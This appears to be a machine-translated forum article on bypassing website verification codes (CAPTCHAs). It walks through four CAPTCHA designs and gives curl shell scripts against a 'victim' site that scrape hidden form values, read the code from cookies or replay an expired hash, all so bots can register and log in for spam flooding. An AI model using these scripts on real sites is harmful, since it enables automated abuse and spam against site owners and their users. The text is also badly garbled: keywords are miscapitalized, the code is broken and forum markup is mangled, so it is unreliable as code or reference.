Verification Code cracking technology

CommentsThe so-called verification code is to generate an image with a string of randomly generated numbers or symbols, and add some interference pixels (preventing OCR) to the image. The user can identify the verification code information with the naked eye, enter a form to submit the website for verification. A function can be used only after the verification is successful. Many websites adopt the verification code technology to prevent users from automatically registering, logging on, And bumping through robots. The so-called verification code is to generate an image with a string of randomly generated numbers or symbols, and add some interference pixels to the image (preventing OCR). The user can identify the verification code information with the naked eye, enter a form to submit the website for verification. A function can be used only after the verification is successful. Many websites adopt the verification code technology to prevent users from automatically registering, logging on, And bumping through robots. There are problems with the implementation of many verification codes. For example, a verification code is provided directly on the webpage and cookies. Example of a Verification CODE on the webpage: CODE: <?
/*
* Filename: authpage. php
* Author: huuworm
* Date: 2003-04-28
* @ Copyleft huuworm.org
*/Srand (double) microtime () * 1000000); // verify whether the user input is consistent with the verification code
If (isset ($ HTTP_POST_VARS ['authinput'])
{
If (strcmp ($ HTTP_POST_VARS ['authnum'], $ HTTP_POST_VARS ['authinput']) = 0)
Echo "Verification Successful! ";
Else
Echo "Verification Failed! ";
}

// Generate a new four-digit integer Verification Code
While ($ authnum = rand () 000) <1000 );
?>
<Form action = authpage. php method = post>
<Table>
Enter the verification code: <input type = text name = authinput style = "width: 80px"> <br>
<Input type = submit name = "verify" value = "submit verification code">
<Input type = hidden name = authnum value = <? Echo $ authnum;?>

</Table>
</Form> [Copy to clipboard] in the preceding example, the verification code is directly stored in the negative. You only need to download the page and obtain the verification code value to go beyond the limit. CODE :#! /Bin/sh
Curl [url] http://www.vicitm.org/authpage.php#/url]
Authinput = 'grep' <input type = hidden name = authnum value = [[: digit:] \ {4 \}> 'grep.txt | sed-e's/[^ 0-9] // g'' # obtain the authnum In the webpage
Curl [url] http://www.vicitm.org/authpage.php#/url]-d name = hacker-d submit = "verify"-d authnum = $ authnum [Copy to clipboard] CODE: session_register ("authnum ");
$ Authnum = strval (rand ("1111", "9999 "));
Setcookie ("authnum", $ authnum );...
<Input type = text name = authnum maxlength = 4>
... If ($ number! = $ Login_check_number | empty ($ number ))
{
Print ("Incorrect verification code! ");
Die ();
}
[Copy to clipboard] The second type is smarter than the previous one, and the verification code value is stored in users' Cookies. However, because Cookies are readable and writable by users, they are easily broken through.
CODE :#! /Bin/sh
$ Username = hacker
$ Password = hackme
Curl [url] http://www.vicitm.org/index.php#/url]-c common_cookie # accept the initial cookies of the server
Curl [url] http://www.vicitm.org/get_code.php#/url]-c $ username. cook-B common_cookie # Get the verification code from cookies
Authnum = 'grep authnum $ username. cook | cut-f7'
Curl [url] http://www.victim.org/login.php#/url]
More advanced verification code. (As if this is the case in this forum ....)
One type of verification code is more advanced than the preceding two types of verification codes. It uses the following algorithms:
1. The server generates a random hash.
2. Use an algorithm (irreversible, difficult to crack) to convert the hash into a verification code number and then convert it into an image.
3. Hash is sent to the client in cookie
3. The customer enters the verification code with an image to log on. The server checks f (hash) = verification code. Features: because attackers do not understand the verification code encoding algorithm used by the server, they cannot directly parse the hash transferred from the server. To deal with this verification code, we can use the "expired cookies" method, that is, to save a specific cookie on the server and write down the corresponding verification code. Each time a verification message is sent, the cookies sent from the server are forcibly discarded and the used cookies and verification codes are used. Just like a phone recharge card can be used multiple times. For example:
Download a verification code image from the server:
Curl http://www.victim.org/get_code.php-c cookie-o auth.png
Manually read and get $ savecookie (hash in the cookie file) and $ authnum (Verification Code ).
When the robot breaks through the verification, the hash given by the server is discarded, and $ savecookie and $ authnum are forcibly used for breakthrough.
CODE: $ savecookie = 294b506f05f896dcbb3a0dde86a5e36c
$ Num = 7701
$ Username = hacker
$ Password = hackme curl [url] http://www.victim.org/index.php#/url]-c $ username. cookie # Get the initialization cookies and session id
Grep-v authhash $ username. cookie> tmp. $ username # discard the hash that the server gives you
Echo "[url] www.victim.org [/url] FALSE/FALSE 0 hash $ savecookie"> tmp. $ username # forcibly use expired hash and Verification Code
Mv tmp. $ username. cookie
Curl [url] http://www.victim.org/login.php#/url]-B $ username. cookie-c $ username. cookie-d username = $ username-d password = $ password-d authnum = $ num # Use the expired verification code to log in.
# Login successful, go crazy irrigation ...... [Copy to clipboard]
The highest-level verification code.
It uses the following methods:
1. The server generates a random hash based on user information (IP address, SID, etc.
2. Use an algorithm (irreversible, difficult to crack) to convert hash into verification code numbers.
3. Hash is not sent to the client again. It is saved to the local database (generally SESSIONS, information about user IP addresses, etc.) and pointed by a serial number seq. (This seq can also be a session id)
4. Seq is sent to the client as cookies.
5. The customer enters the verification code with an image.
5. Server verification method: the server does not check f (hash) = verification code, but reads the expected verification code from the database .. If the user input is the same as the expected value, the verification is successful. Some servers may verify the relationship between seq and session id for further verification.
6. Once the user performs a verification operation or obtains the verification code again, the server replaces the hash value in the database with a new one, and the old value expires. Features:
* Expiration: because the server only expects to save the verification code in the current database, the "Expiration" Verification Code cannot be used (because it has been replaced by the new verification code ).
× High Strength: Only seq is sent, and hash is stored locally. Therefore, it is extremely difficult to decrypt the f (hash) function. Weakness: OCR (optical recognition) seq hijacking "Verification Code" DOS (repeated requests to some seq, causing some users to fail to perform normal verification)
There is no good way to deal with this verification code. The easy way is to download the verification code and display it to the user and then log in. This is applicable when verification is performed only once. Such as verification during login.
CODE: curl [url] http://www.victim.org/get_code.php#/url]-c validate.png-c validcode_cookie # Get the verification CODE image and the corresponding seq.
Seq = 'grep seq validcode_cookie | cut-f7'
For echo-n, enter the verification code in validate.png:
Read valid_number # enter the verification code
# Log in and perform some automated operations, such as crazy irrigation.